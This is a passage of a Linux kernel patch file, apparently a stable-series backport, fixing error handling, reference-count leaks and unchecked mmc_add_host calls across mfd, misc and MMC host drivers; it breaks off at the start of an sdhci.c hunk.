+diff --git a/drivers/mfd/qcom-pm8008.c b/drivers/mfd/qcom-pm8008.c
+index 4b8ff947762f2..9f3c4a01b4c1c 100644
+--- a/drivers/mfd/qcom-pm8008.c
++++ b/drivers/mfd/qcom-pm8008.c
+@@ -215,8 +215,8 @@ static int pm8008_probe(struct i2c_client *client)
+ 
+ 	dev = &client->dev;
+ 	regmap = devm_regmap_init_i2c(client, &qcom_mfd_regmap_cfg);
+-	if (!regmap)
+-		return -ENODEV;
++	if (IS_ERR(regmap))
++		return PTR_ERR(regmap);
+ 
+ 	i2c_set_clientdata(client, regmap);
+ 
+diff --git a/drivers/mfd/qcom_rpm.c b/drivers/mfd/qcom_rpm.c
+index 71bc34b74bc9c..8fea0e511550a 100644
+--- a/drivers/mfd/qcom_rpm.c
++++ b/drivers/mfd/qcom_rpm.c
+@@ -547,7 +547,7 @@ static int qcom_rpm_probe(struct platform_device *pdev)
+ 	init_completion(&rpm->ack);
+ 
+ 	/* Enable message RAM clock */
+-	rpm->ramclk = devm_clk_get(&pdev->dev, "ram");
++	rpm->ramclk = devm_clk_get_enabled(&pdev->dev, "ram");
+ 	if (IS_ERR(rpm->ramclk)) {
+ 		ret = PTR_ERR(rpm->ramclk);
+ 		if (ret == -EPROBE_DEFER)
+@@ -558,7 +558,6 @@ static int qcom_rpm_probe(struct platform_device *pdev)
+ 		 */
+ 		rpm->ramclk = NULL;
+ 	}
+-	clk_prepare_enable(rpm->ramclk); /* Accepts NULL */
+ 
+ 	irq_ack = platform_get_irq_byname(pdev, "ack");
+ 	if (irq_ack < 0)
+@@ -673,22 +672,11 @@ static int qcom_rpm_probe(struct platform_device *pdev)
+ 	if (ret)
+ 		dev_warn(&pdev->dev, "failed to mark wakeup irq as wakeup\n");
+ 
+-	return of_platform_populate(pdev->dev.of_node, NULL, NULL, &pdev->dev);
+-}
+-
+-static int qcom_rpm_remove(struct platform_device *pdev)
+-{
+-	struct qcom_rpm *rpm = dev_get_drvdata(&pdev->dev);
+-
+-	of_platform_depopulate(&pdev->dev);
+-	clk_disable_unprepare(rpm->ramclk);
+-
+-	return 0;
++	return devm_of_platform_populate(&pdev->dev);
+ }
+ 
+ static struct platform_driver qcom_rpm_driver = {
+ 	.probe = qcom_rpm_probe,
+-	.remove = qcom_rpm_remove,
+ 	.driver  = {
+ 		.name  = "qcom_rpm",
+ 		.of_match_table = qcom_rpm_of_match,
+diff --git a/drivers/misc/cxl/guest.c b/drivers/misc/cxl/guest.c
+index 375f692ae9d68..fb95a2d5cef48 100644
+--- a/drivers/misc/cxl/guest.c
++++ b/drivers/misc/cxl/guest.c
+@@ -965,10 +965,10 @@ int cxl_guest_init_afu(struct cxl *adapter, int slice, struct device_node *afu_n
+ 	 * if it returns an error!
+ 	 */
+ 	if ((rc = cxl_register_afu(afu)))
+-		goto err_put1;
++		goto err_put_dev;
+ 
+ 	if ((rc = cxl_sysfs_afu_add(afu)))
+-		goto err_put1;
++		goto err_del_dev;
+ 
+ 	/*
+ 	 * pHyp doesn't expose the programming models supported by the
+@@ -984,7 +984,7 @@ int cxl_guest_init_afu(struct cxl *adapter, int slice, struct device_node *afu_n
+ 		afu->modes_supported = CXL_MODE_DIRECTED;
+ 
+ 	if ((rc = cxl_afu_select_best_mode(afu)))
+-		goto err_put2;
++		goto err_remove_sysfs;
+ 
+ 	adapter->afu[afu->slice] = afu;
+ 
+@@ -1004,10 +1004,12 @@ int cxl_guest_init_afu(struct cxl *adapter, int slice, struct device_node *afu_n
+ 
+ 	return 0;
+ 
+-err_put2:
++err_remove_sysfs:
+ 	cxl_sysfs_afu_remove(afu);
+-err_put1:
+-	device_unregister(&afu->dev);
++err_del_dev:
++	device_del(&afu->dev);
++err_put_dev:
++	put_device(&afu->dev);
+ 	free = false;
+ 	guest_release_serr_irq(afu);
+ err2:
+@@ -1141,18 +1143,20 @@ struct cxl *cxl_guest_init_adapter(struct device_node *np, struct platform_devic
+ 	 * even if it returns an error!
+ 	 */
+ 	if ((rc = cxl_register_adapter(adapter)))
+-		goto err_put1;
++		goto err_put_dev;
+ 
+ 	if ((rc = cxl_sysfs_adapter_add(adapter)))
+-		goto err_put1;
++		goto err_del_dev;
+ 
+ 	/* release the context lock as the adapter is configured */
+ 	cxl_adapter_context_unlock(adapter);
+ 
+ 	return adapter;
+ 
+-err_put1:
+-	device_unregister(&adapter->dev);
++err_del_dev:
++	device_del(&adapter->dev);
++err_put_dev:
++	put_device(&adapter->dev);
+ 	free = false;
+ 	cxl_guest_remove_chardev(adapter);
+ err1:
+diff --git a/drivers/misc/cxl/pci.c b/drivers/misc/cxl/pci.c
+index 3de0aea62ade4..0ff944860dda9 100644
+--- a/drivers/misc/cxl/pci.c
++++ b/drivers/misc/cxl/pci.c
+@@ -387,6 +387,7 @@ int cxl_calc_capp_routing(struct pci_dev *dev, u64 *chipid,
+ 	rc = get_phb_index(np, phb_index);
+ 	if (rc) {
+ 		pr_err("cxl: invalid phb index\n");
++		of_node_put(np);
+ 		return rc;
+ 	}
+ 
+@@ -1164,10 +1165,10 @@ static int pci_init_afu(struct cxl *adapter, int slice, struct pci_dev *dev)
+ 	 * if it returns an error!
+ 	 */
+ 	if ((rc = cxl_register_afu(afu)))
+-		goto err_put1;
++		goto err_put_dev;
+ 
+ 	if ((rc = cxl_sysfs_afu_add(afu)))
+-		goto err_put1;
++		goto err_del_dev;
+ 
+ 	adapter->afu[afu->slice] = afu;
+ 
+@@ -1176,10 +1177,12 @@ static int pci_init_afu(struct cxl *adapter, int slice, struct pci_dev *dev)
+ 
+ 	return 0;
+ 
+-err_put1:
++err_del_dev:
++	device_del(&afu->dev);
++err_put_dev:
+ 	pci_deconfigure_afu(afu);
+ 	cxl_debugfs_afu_remove(afu);
+-	device_unregister(&afu->dev);
++	put_device(&afu->dev);
+ 	return rc;
+ 
+ err_free_native:
+@@ -1667,23 +1670,25 @@ static struct cxl *cxl_pci_init_adapter(struct pci_dev *dev)
+ 	 * even if it returns an error!
+ 	 */
+ 	if ((rc = cxl_register_adapter(adapter)))
+-		goto err_put1;
++		goto err_put_dev;
+ 
+ 	if ((rc = cxl_sysfs_adapter_add(adapter)))
+-		goto err_put1;
++		goto err_del_dev;
+ 
+ 	/* Release the context lock as adapter is configured */
+ 	cxl_adapter_context_unlock(adapter);
+ 
+ 	return adapter;
+ 
+-err_put1:
++err_del_dev:
++	device_del(&adapter->dev);
++err_put_dev:
+ 	/* This should mirror cxl_remove_adapter, except without the
+ 	 * sysfs parts
+ 	 */
+ 	cxl_debugfs_adapter_remove(adapter);
+ 	cxl_deconfigure_adapter(adapter);
+-	device_unregister(&adapter->dev);
++	put_device(&adapter->dev);
+ 	return ERR_PTR(rc);
+ 
+ err_release:
+diff --git a/drivers/misc/habanalabs/common/firmware_if.c b/drivers/misc/habanalabs/common/firmware_if.c
+index 2de6a9bd564de..f18e53bbba6bb 100644
+--- a/drivers/misc/habanalabs/common/firmware_if.c
++++ b/drivers/misc/habanalabs/common/firmware_if.c
+@@ -2983,7 +2983,7 @@ static int hl_fw_get_sec_attest_data(struct hl_device *hdev, u32 packet_id, void
+ 	int rc;
+ 
+ 	req_cpu_addr = hl_cpu_accessible_dma_pool_alloc(hdev, size, &req_dma_addr);
+-	if (!data) {
++	if (!req_cpu_addr) {
+ 		dev_err(hdev->dev,
+ 			"Failed to allocate DMA memory for CPU-CP packet %u\n", packet_id);
+ 		return -ENOMEM;
+diff --git a/drivers/misc/lkdtm/cfi.c b/drivers/misc/lkdtm/cfi.c
+index 5245cf6013c95..fc28714ae3a61 100644
+--- a/drivers/misc/lkdtm/cfi.c
++++ b/drivers/misc/lkdtm/cfi.c
+@@ -54,7 +54,11 @@ static void lkdtm_CFI_FORWARD_PROTO(void)
+ # ifdef CONFIG_ARM64_BTI_KERNEL
+ #  define __no_pac             "branch-protection=bti"
+ # else
+-#  define __no_pac             "branch-protection=none"
++#  ifdef CONFIG_CC_HAS_BRANCH_PROT_PAC_RET
++#   define __no_pac            "branch-protection=none"
++#  else
++#   define __no_pac            "sign-return-address=none"
++#  endif
+ # endif
+ # define __no_ret_protection   __noscs __attribute__((__target__(__no_pac)))
+ #else
+diff --git a/drivers/misc/ocxl/config.c b/drivers/misc/ocxl/config.c
+index e401a51596b9c..92ab49705f645 100644
+--- a/drivers/misc/ocxl/config.c
++++ b/drivers/misc/ocxl/config.c
+@@ -193,6 +193,18 @@ static int read_dvsec_vendor(struct pci_dev *dev)
+ 	return 0;
+ }
+ 
++/**
++ * get_dvsec_vendor0() - Find a related PCI device (function 0)
++ * @dev: PCI device to match
++ * @dev0: The PCI device (function 0) found
++ * @out_pos: The position of PCI device (function 0)
++ *
++ * Returns 0 on success, negative on failure.
++ *
++ * NOTE: If it's successful, the reference of dev0 is increased,
++ * so after using it, the callers must call pci_dev_put() to give
++ * up the reference.
++ */
+ static int get_dvsec_vendor0(struct pci_dev *dev, struct pci_dev **dev0,
+ 			     int *out_pos)
+ {
+@@ -202,10 +214,14 @@ static int get_dvsec_vendor0(struct pci_dev *dev, struct pci_dev **dev0,
+ 		dev = get_function_0(dev);
+ 		if (!dev)
+ 			return -1;
++	} else {
++		dev = pci_dev_get(dev);
+ 	}
+ 	pos = find_dvsec(dev, OCXL_DVSEC_VENDOR_ID);
+-	if (!pos)
++	if (!pos) {
++		pci_dev_put(dev);
+ 		return -1;
++	}
+ 	*dev0 = dev;
+ 	*out_pos = pos;
+ 	return 0;
+@@ -222,6 +238,7 @@ int ocxl_config_get_reset_reload(struct pci_dev *dev, int *val)
+ 
+ 	pci_read_config_dword(dev0, pos + OCXL_DVSEC_VENDOR_RESET_RELOAD,
+ 			      &reset_reload);
++	pci_dev_put(dev0);
+ 	*val = !!(reset_reload & BIT(0));
+ 	return 0;
+ }
+@@ -243,6 +260,7 @@ int ocxl_config_set_reset_reload(struct pci_dev *dev, int val)
+ 		reset_reload &= ~BIT(0);
+ 	pci_write_config_dword(dev0, pos + OCXL_DVSEC_VENDOR_RESET_RELOAD,
+ 			       reset_reload);
++	pci_dev_put(dev0);
+ 	return 0;
+ }
+ 
+diff --git a/drivers/misc/ocxl/file.c b/drivers/misc/ocxl/file.c
+index d46dba2df5a10..452d5777a0e4c 100644
+--- a/drivers/misc/ocxl/file.c
++++ b/drivers/misc/ocxl/file.c
+@@ -541,8 +541,11 @@ int ocxl_file_register_afu(struct ocxl_afu *afu)
+ 		goto err_put;
+ 
+ 	rc = device_register(&info->dev);
+-	if (rc)
+-		goto err_put;
++	if (rc) {
++		free_minor(info);
++		put_device(&info->dev);
++		return rc;
++	}
+ 
+ 	rc = ocxl_sysfs_register_afu(info);
+ 	if (rc)
+diff --git a/drivers/misc/sgi-gru/grufault.c b/drivers/misc/sgi-gru/grufault.c
+index d7ef61e602ede..b836936e97471 100644
+--- a/drivers/misc/sgi-gru/grufault.c
++++ b/drivers/misc/sgi-gru/grufault.c
+@@ -648,6 +648,7 @@ int gru_handle_user_call_os(unsigned long cb)
+ 	if ((cb & (GRU_HANDLE_STRIDE - 1)) || ucbnum >= GRU_NUM_CB)
+ 		return -EINVAL;
+ 
++again:
+ 	gts = gru_find_lock_gts(cb);
+ 	if (!gts)
+ 		return -EINVAL;
+@@ -656,7 +657,11 @@ int gru_handle_user_call_os(unsigned long cb)
+ 	if (ucbnum >= gts->ts_cbr_au_count * GRU_CBR_AU_SIZE)
+ 		goto exit;
+ 
+-	gru_check_context_placement(gts);
++	if (gru_check_context_placement(gts)) {
++		gru_unlock_gts(gts);
++		gru_unload_context(gts, 1);
++		goto again;
++	}
+ 
+ 	/*
+ 	 * CCH may contain stale data if ts_force_cch_reload is set.
+@@ -874,7 +879,11 @@ int gru_set_context_option(unsigned long arg)
+ 		} else {
+ 			gts->ts_user_blade_id = req.val1;
+ 			gts->ts_user_chiplet_id = req.val0;
+-			gru_check_context_placement(gts);
++			if (gru_check_context_placement(gts)) {
++				gru_unlock_gts(gts);
++				gru_unload_context(gts, 1);
++				return ret;
++			}
+ 		}
+ 		break;
+ 	case sco_gseg_owner:
+diff --git a/drivers/misc/sgi-gru/grumain.c b/drivers/misc/sgi-gru/grumain.c
+index 6706ef3c59776..4eb4b94551390 100644
+--- a/drivers/misc/sgi-gru/grumain.c
++++ b/drivers/misc/sgi-gru/grumain.c
+@@ -716,9 +716,10 @@ static int gru_check_chiplet_assignment(struct gru_state *gru,
+  * chiplet. Misassignment can occur if the process migrates to a different
+  * blade or if the user changes the selected blade/chiplet.
+  */
+-void gru_check_context_placement(struct gru_thread_state *gts)
++int gru_check_context_placement(struct gru_thread_state *gts)
+ {
+ 	struct gru_state *gru;
++	int ret = 0;
+ 
+ 	/*
+ 	 * If the current task is the context owner, verify that the
+@@ -726,15 +727,23 @@ void gru_check_context_placement(struct gru_thread_state *gts)
+ 	 * references. Pthread apps use non-owner references to the CBRs.
+ 	 */
+ 	gru = gts->ts_gru;
++	/*
++	 * If gru or gts->ts_tgid_owner isn't initialized properly, return
++	 * success to indicate that the caller does not need to unload the
++	 * gru context.The caller is responsible for their inspection and
++	 * reinitialization if needed.
++	 */
+ 	if (!gru || gts->ts_tgid_owner != current->tgid)
+-		return;
++		return ret;
+ 
+ 	if (!gru_check_chiplet_assignment(gru, gts)) {
+ 		STAT(check_context_unload);
+-		gru_unload_context(gts, 1);
++		ret = -EINVAL;
+ 	} else if (gru_retarget_intr(gts)) {
+ 		STAT(check_context_retarget_intr);
+ 	}
++
++	return ret;
+ }
+ 
+ 
+@@ -934,7 +943,12 @@ again:
+ 	mutex_lock(&gts->ts_ctxlock);
+ 	preempt_disable();
+ 
+-	gru_check_context_placement(gts);
++	if (gru_check_context_placement(gts)) {
++		preempt_enable();
++		mutex_unlock(&gts->ts_ctxlock);
++		gru_unload_context(gts, 1);
++		return VM_FAULT_NOPAGE;
++	}
+ 
+ 	if (!gts->ts_gru) {
+ 		STAT(load_user_context);
+diff --git a/drivers/misc/sgi-gru/grutables.h b/drivers/misc/sgi-gru/grutables.h
+index 8c52776db2341..640daf1994df7 100644
+--- a/drivers/misc/sgi-gru/grutables.h
++++ b/drivers/misc/sgi-gru/grutables.h
+@@ -632,7 +632,7 @@ extern int gru_user_flush_tlb(unsigned long arg);
+ extern int gru_user_unload_context(unsigned long arg);
+ extern int gru_get_exception_detail(unsigned long arg);
+ extern int gru_set_context_option(unsigned long address);
+-extern void gru_check_context_placement(struct gru_thread_state *gts);
++extern int gru_check_context_placement(struct gru_thread_state *gts);
+ extern int gru_cpu_fault_map_id(void);
+ extern struct vm_area_struct *gru_find_vma(unsigned long vaddr);
+ extern void gru_flush_all_tlb(struct gru_state *gru);
+diff --git a/drivers/misc/tifm_7xx1.c b/drivers/misc/tifm_7xx1.c
+index 017c2f7d62871..7dd86a9858aba 100644
+--- a/drivers/misc/tifm_7xx1.c
++++ b/drivers/misc/tifm_7xx1.c
+@@ -190,7 +190,7 @@ static void tifm_7xx1_switch_media(struct work_struct *work)
+ 				spin_unlock_irqrestore(&fm->lock, flags);
+ 			}
+ 			if (sock)
+-				tifm_free_device(&sock->dev);
++				put_device(&sock->dev);
+ 		}
+ 		spin_lock_irqsave(&fm->lock, flags);
+ 	}
+diff --git a/drivers/mmc/core/sd.c b/drivers/mmc/core/sd.c
+index 3662bf5320ce5..72b664ed90cf6 100644
+--- a/drivers/mmc/core/sd.c
++++ b/drivers/mmc/core/sd.c
+@@ -1259,7 +1259,7 @@ static int sd_read_ext_regs(struct mmc_card *card)
+ 	 */
+ 	err = sd_read_ext_reg(card, 0, 0, 0, 512, gen_info_buf);
+ 	if (err) {
+-		pr_warn("%s: error %d reading general info of SD ext reg\n",
++		pr_err("%s: error %d reading general info of SD ext reg\n",
+ 			mmc_hostname(card->host), err);
+ 		goto out;
+ 	}
+@@ -1273,7 +1273,12 @@ static int sd_read_ext_regs(struct mmc_card *card)
+ 	/* Number of extensions to be find. */
+ 	num_ext = gen_info_buf[4];
+ 
+-	/* We support revision 0, but limit it to 512 bytes for simplicity. */
++	/*
++	 * We only support revision 0 and limit it to 512 bytes for simplicity.
++	 * No matter what, let's return zero to allow us to continue using the
++	 * card, even if we can't support the features from the SD function
++	 * extensions registers.
++	 */
+ 	if (rev != 0 || len > 512) {
+ 		pr_warn("%s: non-supported SD ext reg layout\n",
+ 			mmc_hostname(card->host));
+@@ -1288,7 +1293,7 @@ static int sd_read_ext_regs(struct mmc_card *card)
+ 	for (i = 0; i < num_ext; i++) {
+ 		err = sd_parse_ext_reg(card, gen_info_buf, &next_ext_addr);
+ 		if (err) {
+-			pr_warn("%s: error %d parsing SD ext reg\n",
++			pr_err("%s: error %d parsing SD ext reg\n",
+ 				mmc_hostname(card->host), err);
+ 			goto out;
+ 		}
+diff --git a/drivers/mmc/host/alcor.c b/drivers/mmc/host/alcor.c
+index bfb8efeb7eb80..d01df01d4b4d1 100644
+--- a/drivers/mmc/host/alcor.c
++++ b/drivers/mmc/host/alcor.c
+@@ -1114,7 +1114,10 @@ static int alcor_pci_sdmmc_drv_probe(struct platform_device *pdev)
+ 	alcor_hw_init(host);
+ 
+ 	dev_set_drvdata(&pdev->dev, host);
+-	mmc_add_host(mmc);
++	ret = mmc_add_host(mmc);
++	if (ret)
++		goto free_host;
++
+ 	return 0;
+ 
+ free_host:
+diff --git a/drivers/mmc/host/atmel-mci.c b/drivers/mmc/host/atmel-mci.c
+index 91d52ba7a39fc..bb9bbf1c927b6 100644
+--- a/drivers/mmc/host/atmel-mci.c
++++ b/drivers/mmc/host/atmel-mci.c
+@@ -2222,6 +2222,7 @@ static int atmci_init_slot(struct atmel_mci *host,
+ {
+ 	struct mmc_host			*mmc;
+ 	struct atmel_mci_slot		*slot;
++	int ret;
+ 
+ 	mmc = mmc_alloc_host(sizeof(struct atmel_mci_slot), &host->pdev->dev);
+ 	if (!mmc)
+@@ -2305,11 +2306,13 @@ static int atmci_init_slot(struct atmel_mci *host,
+ 
+ 	host->slot[id] = slot;
+ 	mmc_regulator_get_supply(mmc);
+-	mmc_add_host(mmc);
++	ret = mmc_add_host(mmc);
++	if (ret) {
++		mmc_free_host(mmc);
++		return ret;
++	}
+ 
+ 	if (gpio_is_valid(slot->detect_pin)) {
+-		int ret;
+-
+ 		timer_setup(&slot->detect_timer, atmci_detect_change, 0);
+ 
+ 		ret = request_irq(gpio_to_irq(slot->detect_pin),
+diff --git a/drivers/mmc/host/litex_mmc.c b/drivers/mmc/host/litex_mmc.c
+index 6ba0d63b8c078..39c6707fdfdbc 100644
+--- a/drivers/mmc/host/litex_mmc.c
++++ b/drivers/mmc/host/litex_mmc.c
+@@ -502,6 +502,7 @@ static int litex_mmc_irq_init(struct platform_device *pdev,
+ 
+ use_polling:
+ 	host->mmc->caps |= MMC_CAP_NEEDS_POLL;
++	host->irq = 0;
+ 	return 0;
+ }
+ 
+diff --git a/drivers/mmc/host/meson-gx-mmc.c b/drivers/mmc/host/meson-gx-mmc.c
+index df05e60bed9a2..6e5ea0213b477 100644
+--- a/drivers/mmc/host/meson-gx-mmc.c
++++ b/drivers/mmc/host/meson-gx-mmc.c
+@@ -1335,7 +1335,9 @@ static int meson_mmc_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	mmc->ops = &meson_mmc_ops;
+-	mmc_add_host(mmc);
++	ret = mmc_add_host(mmc);
++	if (ret)
++		goto err_free_irq;
+ 
+ 	return 0;
+ 
+diff --git a/drivers/mmc/host/mmci.c b/drivers/mmc/host/mmci.c
+index 012aa85489d86..b9e5dfe74e5c7 100644
+--- a/drivers/mmc/host/mmci.c
++++ b/drivers/mmc/host/mmci.c
+@@ -2256,7 +2256,9 @@ static int mmci_probe(struct amba_device *dev,
+ 	pm_runtime_set_autosuspend_delay(&dev->dev, 50);
+ 	pm_runtime_use_autosuspend(&dev->dev);
+ 
+-	mmc_add_host(mmc);
++	ret = mmc_add_host(mmc);
++	if (ret)
++		goto clk_disable;
+ 
+ 	pm_runtime_put(&dev->dev);
+ 	return 0;
+diff --git a/drivers/mmc/host/moxart-mmc.c b/drivers/mmc/host/moxart-mmc.c
+index dfc3ffd5b1f8c..52ed30f2d9f4f 100644
+--- a/drivers/mmc/host/moxart-mmc.c
++++ b/drivers/mmc/host/moxart-mmc.c
+@@ -665,7 +665,9 @@ static int moxart_probe(struct platform_device *pdev)
+ 		goto out;
+ 
+ 	dev_set_drvdata(dev, mmc);
+-	mmc_add_host(mmc);
++	ret = mmc_add_host(mmc);
++	if (ret)
++		goto out;
+ 
+ 	dev_dbg(dev, "IRQ=%d, FIFO is %d bytes\n", irq, host->fifo_width);
+ 
+diff --git a/drivers/mmc/host/mxcmmc.c b/drivers/mmc/host/mxcmmc.c
+index 2cf0413407ea2..668f865f3efb0 100644
+--- a/drivers/mmc/host/mxcmmc.c
++++ b/drivers/mmc/host/mxcmmc.c
+@@ -1143,7 +1143,9 @@ static int mxcmci_probe(struct platform_device *pdev)
+ 
+ 	timer_setup(&host->watchdog, mxcmci_watchdog, 0);
+ 
+-	mmc_add_host(mmc);
++	ret = mmc_add_host(mmc);
++	if (ret)
++		goto out_free_dma;
+ 
+ 	return 0;
+ 
+diff --git a/drivers/mmc/host/omap_hsmmc.c b/drivers/mmc/host/omap_hsmmc.c
+index fca30add563e9..4bd7447552055 100644
+--- a/drivers/mmc/host/omap_hsmmc.c
++++ b/drivers/mmc/host/omap_hsmmc.c
+@@ -1946,7 +1946,9 @@ static int omap_hsmmc_probe(struct platform_device *pdev)
+ 	if (!ret)
+ 		mmc->caps |= MMC_CAP_SDIO_IRQ;
+ 
+-	mmc_add_host(mmc);
++	ret = mmc_add_host(mmc);
++	if (ret)
++		goto err_irq;
+ 
+ 	if (mmc_pdata(host)->name != NULL) {
+ 		ret = device_create_file(&mmc->class_dev, &dev_attr_slot_name);
+diff --git a/drivers/mmc/host/pxamci.c b/drivers/mmc/host/pxamci.c
+index e4003f6058eb5..2a988f942b6ca 100644
+--- a/drivers/mmc/host/pxamci.c
++++ b/drivers/mmc/host/pxamci.c
+@@ -763,7 +763,12 @@ static int pxamci_probe(struct platform_device *pdev)
+ 			dev_warn(dev, "gpio_ro and get_ro() both defined\n");
+ 	}
+ 
+-	mmc_add_host(mmc);
++	ret = mmc_add_host(mmc);
++	if (ret) {
++		if (host->pdata && host->pdata->exit)
++			host->pdata->exit(dev, mmc);
++		goto out;
++	}
+ 
+ 	return 0;
+ 
+diff --git a/drivers/mmc/host/renesas_sdhi.h b/drivers/mmc/host/renesas_sdhi.h
+index c4abfee1ebae1..e4c490729c98e 100644
+--- a/drivers/mmc/host/renesas_sdhi.h
++++ b/drivers/mmc/host/renesas_sdhi.h
+@@ -44,6 +44,7 @@ struct renesas_sdhi_quirks {
+ 	bool fixed_addr_mode;
+ 	bool dma_one_rx_only;
+ 	bool manual_tap_correction;
++	bool old_info1_layout;
+ 	u32 hs400_bad_taps;
+ 	const u8 (*hs400_calib_table)[SDHI_CALIB_TABLE_MAX];
+ };
+diff --git a/drivers/mmc/host/renesas_sdhi_core.c b/drivers/mmc/host/renesas_sdhi_core.c
+index b970699743e0a..e38d0e8b8e0ed 100644
+--- a/drivers/mmc/host/renesas_sdhi_core.c
++++ b/drivers/mmc/host/renesas_sdhi_core.c
+@@ -546,7 +546,7 @@ static void renesas_sdhi_reset_hs400_mode(struct tmio_mmc_host *host,
+ 			 SH_MOBILE_SDHI_SCC_TMPPORT2_HS400OSEL) &
+ 			sd_scc_read32(host, priv, SH_MOBILE_SDHI_SCC_TMPPORT2));
+ 
+-	if (priv->adjust_hs400_calib_table)
++	if (priv->quirks && (priv->quirks->hs400_calib_table || priv->quirks->hs400_bad_taps))
+ 		renesas_sdhi_adjust_hs400_mode_disable(host);
+ 
+ 	sd_ctrl_write16(host, CTL_SD_CARD_CLK_CTL, CLK_CTL_SCLKEN |
+@@ -1068,11 +1068,14 @@ int renesas_sdhi_probe(struct platform_device *pdev,
+ 	if (ver >= SDHI_VER_GEN3_SD)
+ 		host->get_timeout_cycles = renesas_sdhi_gen3_get_cycles;
+ 
++	/* Check for SCC so we can reset it if needed */
++	if (of_data && of_data->scc_offset && ver >= SDHI_VER_GEN2_SDR104)
++		priv->scc_ctl = host->ctl + of_data->scc_offset;
++
+ 	/* Enable tuning iff we have an SCC and a supported mode */
+-	if (of_data && of_data->scc_offset &&
+-	    (host->mmc->caps & MMC_CAP_UHS_SDR104 ||
+-	     host->mmc->caps2 & (MMC_CAP2_HS200_1_8V_SDR |
+-				 MMC_CAP2_HS400_1_8V))) {
++	if (priv->scc_ctl && (host->mmc->caps & MMC_CAP_UHS_SDR104 ||
++	    host->mmc->caps2 & (MMC_CAP2_HS200_1_8V_SDR |
++				MMC_CAP2_HS400_1_8V))) {
+ 		const struct renesas_sdhi_scc *taps = of_data->taps;
+ 		bool use_4tap = quirks && quirks->hs400_4taps;
+ 		bool hit = false;
+@@ -1092,7 +1095,6 @@ int renesas_sdhi_probe(struct platform_device *pdev,
+ 		if (!hit)
+ 			dev_warn(&host->pdev->dev, "Unknown clock rate for tuning\n");
+ 
+-		priv->scc_ctl = host->ctl + of_data->scc_offset;
+ 		host->check_retune = renesas_sdhi_check_scc_error;
+ 		host->ops.execute_tuning = renesas_sdhi_execute_tuning;
+ 		host->ops.prepare_hs400_tuning = renesas_sdhi_prepare_hs400_tuning;
+diff --git a/drivers/mmc/host/renesas_sdhi_internal_dmac.c b/drivers/mmc/host/renesas_sdhi_internal_dmac.c
+index 42937596c4c41..7c81c2680701f 100644
+--- a/drivers/mmc/host/renesas_sdhi_internal_dmac.c
++++ b/drivers/mmc/host/renesas_sdhi_internal_dmac.c
+@@ -49,7 +49,8 @@
+ /* DM_CM_INFO1 and DM_CM_INFO1_MASK */
+ #define INFO1_CLEAR		0
+ #define INFO1_MASK_CLEAR	GENMASK_ULL(31, 0)
+-#define INFO1_DTRANEND1		BIT(17)
++#define INFO1_DTRANEND1		BIT(20)
++#define INFO1_DTRANEND1_OLD	BIT(17)
+ #define INFO1_DTRANEND0		BIT(16)
+ 
+ /* DM_CM_INFO2 and DM_CM_INFO2_MASK */
+@@ -165,6 +166,7 @@ static const struct renesas_sdhi_quirks sdhi_quirks_4tap_nohs400_one_rx = {
+ 	.hs400_disabled = true,
+ 	.hs400_4taps = true,
+ 	.dma_one_rx_only = true,
++	.old_info1_layout = true,
+ };
+ 
+ static const struct renesas_sdhi_quirks sdhi_quirks_4tap = {
+diff --git a/drivers/mmc/host/rtsx_pci_sdmmc.c b/drivers/mmc/host/rtsx_pci_sdmmc.c
+index e1580f78c6b2d..8098726dcc0bf 100644
+--- a/drivers/mmc/host/rtsx_pci_sdmmc.c
++++ b/drivers/mmc/host/rtsx_pci_sdmmc.c
+@@ -1474,6 +1474,7 @@ static int rtsx_pci_sdmmc_drv_probe(struct platform_device *pdev)
+ 	struct realtek_pci_sdmmc *host;
+ 	struct rtsx_pcr *pcr;
+ 	struct pcr_handle *handle = pdev->dev.platform_data;
++	int ret;
+ 
+ 	if (!handle)
+ 		return -ENXIO;
+@@ -1511,7 +1512,13 @@ static int rtsx_pci_sdmmc_drv_probe(struct platform_device *pdev)
+ 	pm_runtime_mark_last_busy(&pdev->dev);
+ 	pm_runtime_use_autosuspend(&pdev->dev);
+ 
+-	mmc_add_host(mmc);
++	ret = mmc_add_host(mmc);
++	if (ret) {
++		pm_runtime_dont_use_autosuspend(&pdev->dev);
++		pm_runtime_disable(&pdev->dev);
++		mmc_free_host(mmc);
++		return ret;
++	}
+ 
+ 	return 0;
+ }
+diff --git a/drivers/mmc/host/rtsx_usb_sdmmc.c b/drivers/mmc/host/rtsx_usb_sdmmc.c
+index 5798aee066531..2c650cd58693e 100644
+--- a/drivers/mmc/host/rtsx_usb_sdmmc.c
++++ b/drivers/mmc/host/rtsx_usb_sdmmc.c
+@@ -1329,6 +1329,7 @@ static int rtsx_usb_sdmmc_drv_probe(struct platform_device *pdev)
+ #ifdef RTSX_USB_USE_LEDS_CLASS
+ 	int err;
+ #endif
++	int ret;
+ 
+ 	ucr = usb_get_intfdata(to_usb_interface(pdev->dev.parent));
+ 	if (!ucr)
+@@ -1365,7 +1366,15 @@ static int rtsx_usb_sdmmc_drv_probe(struct platform_device *pdev)
+ 	INIT_WORK(&host->led_work, rtsx_usb_update_led);
+ 
+ #endif
+-	mmc_add_host(mmc);
++	ret = mmc_add_host(mmc);
++	if (ret) {
++#ifdef RTSX_USB_USE_LEDS_CLASS
++		led_classdev_unregister(&host->led);
++#endif
++		mmc_free_host(mmc);
++		pm_runtime_disable(&pdev->dev);
++		return ret;
++	}
+ 
+ 	return 0;
+ }
+diff --git a/drivers/mmc/host/sdhci-tegra.c b/drivers/mmc/host/sdhci-tegra.c
+index c71000a07656e..1adaa94c31aca 100644
+--- a/drivers/mmc/host/sdhci-tegra.c
++++ b/drivers/mmc/host/sdhci-tegra.c
+@@ -1526,7 +1526,8 @@ static const struct sdhci_pltfm_data sdhci_tegra186_pdata = {
+ 		  SDHCI_QUIRK_NO_HISPD_BIT |
+ 		  SDHCI_QUIRK_BROKEN_ADMA_ZEROLEN_DESC |
+ 		  SDHCI_QUIRK_CAP_CLOCK_BASE_BROKEN,
+-	.quirks2 = SDHCI_QUIRK2_PRESET_VALUE_BROKEN,
++	.quirks2 = SDHCI_QUIRK2_PRESET_VALUE_BROKEN |
++		   SDHCI_QUIRK2_ISSUE_CMD_DAT_RESET_TOGETHER,
+ 	.ops  = &tegra186_sdhci_ops,
+ };
+ 
+diff --git a/drivers/mmc/host/sdhci.c b/drivers/mmc/host/sdhci.c
+index c7ad32a75b570..632341911b6e7 100644
+--- a/drivers/mmc/host/sdhci.c
++++ b/drivers/mmc/host/sdhci.c
+@@ -270,6 +270,11 @@ enum sdhci_reset_reason {
+ 
